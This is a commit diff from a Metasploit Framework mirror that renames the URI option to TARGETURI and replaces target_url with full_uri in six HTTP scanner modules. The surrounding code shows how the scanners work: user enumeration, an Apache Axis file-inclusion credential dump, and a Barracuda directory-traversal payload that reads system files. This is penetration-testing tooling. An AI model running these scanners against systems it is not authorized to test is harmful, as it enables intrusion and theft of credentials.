infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #6281, TARGETURI/full_uri fixes

bug/bundler_fix
William Vu 2015-11-25 13:15:50 -06:00
parent f9d3652e1a 8f459de064
commit e56aa96a66
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
6 changed files with 66 additions and 95 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
modules/auxiliary/scanner/http/apache_userdir_enum.rb
View File

@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('URI', [true, 'The path to users Home Page', '/']),
OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ]),
], self.class)
@ -51,11 +51,6 @@ class Metasploit3 < Msf::Auxiliary
)
end
def target_url
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end
def run_host(ip)
@users_found = {}
@ -64,9 +59,9 @@ class Metasploit3 < Msf::Auxiliary
}
if(@users_found.empty?)
print_status("#{target_url} - No users found.")
print_status("#{full_uri} - No users found.")
else
print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}")
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
report_note(
:host => rhost,
:port => rport,
@ -80,8 +75,8 @@ class Metasploit3 < Msf::Auxiliary
def do_login(user)
vprint_status("#{target_url}~#{user} - Trying UserDir: '#{user}'")
uri = normalize_uri(datastore['URI'])
vprint_status("#{full_uri}~#{user} - Trying UserDir: '#{user}'")
uri = normalize_uri(target_uri.path)
payload = "#{uri}~#{user}/"
begin
res = send_request_cgi(
@ -93,10 +88,10 @@ class Metasploit3 < Msf::Auxiliary
return unless res
if ((res.code == 403) or (res.code == 200))
print_good("#{target_url} - Apache UserDir: '#{user}' found ")
print_good("#{full_uri} - Apache UserDir: '#{user}' found ")
@users_found[user] = :reported
else
vprint_status("#{target_url} - Apache UserDir: '#{user}' not found ")
vprint_status("#{full_uri} - Apache UserDir: '#{user}' not found ")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE

26
modules/auxiliary/scanner/http/axis_local_file_include.rb
View File

@ -34,17 +34,12 @@ class Metasploit3 < Msf::Auxiliary
register_options([
Opt::RPORT(8080),
OptString.new('URI', [false, 'The path to the Axis listServices', '/axis2/services/listServices']),
OptString.new('TARGETURI', [false, 'The path to the Axis listServices', '/axis2/services/listServices']),
], self.class)
end
def target_url
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end
def run_host(ip)
uri = normalize_uri(datastore['URI'])
uri = normalize_uri(target_uri.path)
begin
res = send_request_raw({
@ -53,13 +48,12 @@ class Metasploit3 < Msf::Auxiliary
}, 25)
if (res and res.code == 200)
extract_uri = res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)
new_uri = "/axis2/services/#{$1}"
new_uri = normalize_uri(new_uri)
res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)
new_uri = normalize_uri("/axis2/services/#{$1}")
get_credentials(new_uri)
else
print_status("#{target_url} - Apache Axis - The remote page not accessible")
print_status("#{full_uri} - Apache Axis - The remote page not accessible")
return
end
@ -106,10 +100,10 @@ class Metasploit3 < Msf::Auxiliary
'uri' => "#{uri}" + lfi_payload,
}, 25)
print_status("#{target_url} - Apache Axis - Dumping administrative credentials")
print_status("#{full_uri} - Apache Axis - Dumping administrative credentials")
if res.nil?
print_error("#{target_url} - Connection timed out")
print_error("#{full_uri} - Connection timed out")
return
end
@ -121,17 +115,17 @@ class Metasploit3 < Msf::Auxiliary
res.body.scan(/parameter\sname=\"password\">([^\s]+)</)
password = $1
print_good("#{target_url} - Apache Axis - Credentials Found Username: '#{username}' - Password: '#{password}'")
print_good("#{full_uri} - Apache Axis - Credentials Found Username: '#{username}' - Password: '#{password}'")
report_cred(ip: rhost, port: rport, user: username, password: password, proof: res.body)
else
print_error("#{target_url} - Apache Axis - Not Vulnerable")
print_error("#{full_uri} - Apache Axis - Not Vulnerable")
return :abort
end
else
print_error("#{target_url} - Apache Axis - Unrecognized #{res.code} response")
print_error("#{full_uri} - Apache Axis - Unrecognized #{res.code} response")
return :abort
end

27
modules/auxiliary/scanner/http/barracuda_directory_traversal.rb
View File

@ -38,21 +38,16 @@ class Metasploit3 < Msf::Auxiliary
[
Opt::RPORT(8000),
OptString.new('FILE', [ true, "Define the remote file to view, ex:/etc/passwd", '/mail/snapshot/config.snapshot']),
OptString.new('URI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),
OptString.new('TARGETURI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),
], self.class)
end
def target_url
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end
def run_host(ip)
uri = normalize_uri(datastore['URI'])
uri = normalize_uri(target_uri.path)
file = datastore['FILE']
payload = "?locale=/../../../../../../..#{file}%00"
print_status("#{target_url} - Barracuda - Checking if remote server is vulnerable")
print_status("#{full_uri} - Barracuda - Checking if remote server is vulnerable")
res = send_request_raw(
{
@ -61,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
}, 25)
if res.nil?
print_error("#{target_url} - Connection timed out")
print_error("#{full_uri} - Connection timed out")
return
end
@ -73,21 +68,21 @@ class Metasploit3 < Msf::Auxiliary
if html.length > 100
file_data = html.gsub(%r{</?[^>]+?>}, '')
print_good("#{target_url} - Barracuda - Vulnerable")
print_good("#{target_url} - Barracuda - File Output:\n" + file_data + "\n")
print_good("#{full_uri} - Barracuda - Vulnerable")
print_good("#{full_uri} - Barracuda - File Output:\n" + file_data + "\n")
else
print_error("#{target_url} - Barracuda - Not vulnerable: HTML too short?")
print_error("#{full_uri} - Barracuda - Not vulnerable: HTML too short?")
end
elsif res.body =~ /help_page/
print_error("#{target_url} - Barracuda - Not vulnerable: Patched?")
print_error("#{full_uri} - Barracuda - Not vulnerable: Patched?")
else
print_error("#{target_url} - Barracuda - File not found or permission denied")
print_error("#{full_uri} - Barracuda - File not found or permission denied")
end
else
print_error("#{target_url} - Barracuda - No HTML was returned")
print_error("#{full_uri} - Barracuda - No HTML was returned")
end
else
print_error("#{target_url} - Barracuda - Unrecognized #{res.code} response")
print_error("#{full_uri} - Barracuda - Unrecognized #{res.code} response")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

21
modules/auxiliary/scanner/http/nginx_source_disclosure.rb
View File

@ -35,18 +35,13 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('URI', [true, 'Specify the path to download the file (ex: admin.php)', '/admin.php']),
OptString.new('TARGETURI', [true, 'Specify the path to download the file (ex: admin.php)', '/admin.php']),
OptString.new('PATH_SAVE', [true, 'The path to save the downloaded source code', '']),
], self.class)
end
def target_url
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end
def run_host(ip)
uri = normalize_uri(datastore['URI'])
uri = normalize_uri(target_uri.path)
path_save = datastore['PATH_SAVE']
vuln_versions = [
@ -70,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
}, 25)
if res.nil?
print_error("#{target_url} - nginx - Connection timed out")
print_error("#{full_uri} - nginx - Connection timed out")
return
else
version = res.headers['Server']
@ -78,17 +73,17 @@ class Metasploit3 < Msf::Auxiliary
end
if vuln_versions.include?(version)
print_good("#{target_url} - nginx - Vulnerable version: #{version}")
print_good("#{full_uri} - nginx - Vulnerable version: #{version}")
if (res and res.code == 200)
print_good("#{target_url} - nginx - Getting the source of page #{uri}")
print_good("#{full_uri} - nginx - Getting the source of page #{uri}")
save_source = File.new("#{path_save}#{uri}","w")
save_source.puts(res.body.to_s)
save_source.close
print_status("#{target_url} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}"))
print_status("#{full_uri} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}"))
else
print_error("http://#{vhost}:#{rport} - nginx - Unrecognized #{res.code} response")
@ -98,9 +93,9 @@ class Metasploit3 < Msf::Auxiliary
else
if version =~ /nginx/
print_error("#{target_url} - nginx - Cannot exploit: the remote server is not vulnerable - Version #{version}")
print_error("#{full_uri} - nginx - Cannot exploit: the remote server is not vulnerable - Version #{version}")
else
print_error("#{target_url} - nginx - Cannot exploit: the remote server is not ngnix")
print_error("#{full_uri} - nginx - Cannot exploit: the remote server is not ngnix")
end
return

33
modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb
View File

@ -40,17 +40,12 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('URI', [true, 'The path to users Squiz Matrix installation', '/']),
OptString.new('TARGETURI', [true, 'The path to users Squiz Matrix installation', '/']),
OptInt.new('ASSETBEGIN', [ true, "Asset ID to start at", 1]),
OptInt.new('ASSETEND', [ true, "Asset ID to stop at", 100]),
], self.class)
end
def target_url
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end
def run_host(ip)
@users_found = {}
@ -65,9 +60,9 @@ class Metasploit3 < Msf::Auxiliary
end
if(@users_found.empty?)
print_status("#{target_url} - No users found.")
print_status("#{full_uri} - No users found.")
else
print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}")
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
report_note(
:host => rhost,
:port => rport,
@ -106,16 +101,18 @@ class Metasploit3 < Msf::Auxiliary
def do_enum(asset)
begin
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => "#{target_url}?a=#{asset}",
'uri' => "#{uri}?a=#{asset}",
'method' => 'GET'
}, 20)
if (datastore['VERBOSE'])
if (res and res.code = 403 and res.body and res.body =~ /You do not have permission to access <i>(\w+)<\/i>/)
print_status("#{target_url}?a=#{asset} - Trying Asset: '#{asset}' title '#{$1}'")
print_status("#{full_uri}?a=#{asset} - Trying Asset: '#{asset}' title '#{$1}'")
else
print_status("#{target_url}?a=#{asset} - Trying Asset: '#{asset}'")
print_status("#{full_uri}?a=#{asset} - Trying Asset: '#{asset}'")
end
end
@ -123,25 +120,25 @@ class Metasploit3 < Msf::Auxiliary
user=$1.strip
# try the full name of the user
tmpasset = asset -1
tmpasset = asset - 1
res = send_request_cgi({
'uri' => "#{target_url}?a=#{tmpasset}",
'uri' => "#{uri}?a=#{tmpasset}",
'method' => 'GET'
}, 20)
if (res and res.code = 403 and res.body and res.body =~ /You do not have permission to access <i>Inbox<\/i>/)
tmpasset = asset -2
tmpasset = asset - 2
res = send_request_cgi({
'uri' => "#{target_url}?a=#{tmpasset}",
'uri' => "#{uri}?a=#{tmpasset}",
'method' => 'GET'
}, 20)
print_good("#{target_url}?a=#{asset} - Trying to obtain fullname for Asset ID '#{asset}', '#{user}'")
print_good("#{full_uri}?a=#{asset} - Trying to obtain fullname for Asset ID '#{asset}', '#{user}'")
if (res and res.code = 403 and res.body and res.body =~ /You do not have permission to access <i>(.*)<\/i>/)
fullname = $1.strip
print_good("#{target_url}?a=#{tmpasset} - Squiz Matrix User Found: '#{user}' (#{fullname})")
print_good("#{full_uri}?a=#{tmpasset} - Squiz Matrix User Found: '#{user}' (#{fullname})")
@users_found["#{user} (#{fullname})"] = :reported
end
else
print_good("#{target_url} - Squiz Matrix User: '#{user}'")
print_good("#{full_uri} - Squiz Matrix User: '#{user}'")
@users_found[user] = :reported
end

35
modules/auxiliary/scanner/http/tomcat_enum.rb
View File

@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
Opt::RPORT(8080),
OptString.new('URI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
OptString.new('TARGETURI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
File.join(Msf::Config.data_directory, "wordlists", "tomcat_mgr_default_users.txt") ]),
], self.class)
@ -49,16 +49,11 @@ class Metasploit3 < Msf::Auxiliary
deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME')
end
def target_url
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end
def has_j_security_check?
vprint_status("#{target_url} - Checking j_security_check...")
res = send_request_raw({'uri' => normalize_uri(datastore['URI'])})
vprint_status("#{full_uri} - Checking j_security_check...")
res = send_request_raw({'uri' => normalize_uri(target_uri.path)})
if res
vprint_status("#{target_url} - Server returned: #{res.code.to_s}")
vprint_status("#{full_uri} - Server returned: #{res.code.to_s}")
return true if res.code == 200 or res.code == 302
end
@ -67,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
unless has_j_security_check?
print_error("#{target_url} - Unable to enumerate users with this URI")
print_error("#{full_uri} - Unable to enumerate users with this URI")
return
end
@ -78,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary
}
if(@users_found.empty?)
print_status("#{target_url} - No users found.")
print_status("#{full_uri} - No users found.")
else
print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}")
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
report_note(
:host => rhost,
:port => rport,
@ -92,34 +87,34 @@ class Metasploit3 < Msf::Auxiliary
def do_login(user)
post_data = "j_username=#{user}&password=%"
vprint_status("#{target_url} - Apache Tomcat - Trying name: '#{user}'")
vprint_status("#{full_uri} - Apache Tomcat - Trying name: '#{user}'")
begin
res = send_request_cgi(
{
'method' => 'POST',
'uri' => normalize_uri(datastore['URI']),
'uri' => normalize_uri(target_uri.path),
'data' => post_data,
}, 20)
if res and res.code == 200 and !res.get_cookies.empty?
vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
vprint_error("#{full_uri} - Apache Tomcat #{user} not found ")
elsif res and res.code == 200 and res.body =~ /invalid username/i
vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
vprint_error("#{full_uri} - Apache Tomcat #{user} not found ")
elsif res and res.code == 500
# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
vprint_good("#{target_url} - Apache Tomcat #{user} found ")
vprint_good("#{full_uri} - Apache Tomcat #{user} found ")
@users_found[user] = :reported
elsif res and res.body.empty? and res.headers['Location'] !~ /error\.jsp$/
# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
print_good("#{target_url} - Apache Tomcat #{user} found ")
print_good("#{full_uri} - Apache Tomcat #{user} found ")
@users_found[user] = :reported
else
print_error("#{target_url} - NOT VULNERABLE")
print_error("#{full_uri} - NOT VULNERABLE")
return :abort
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
print_error("#{target_url} - UNREACHABLE")
print_error("#{full_uri} - UNREACHABLE")
return :abort
end
end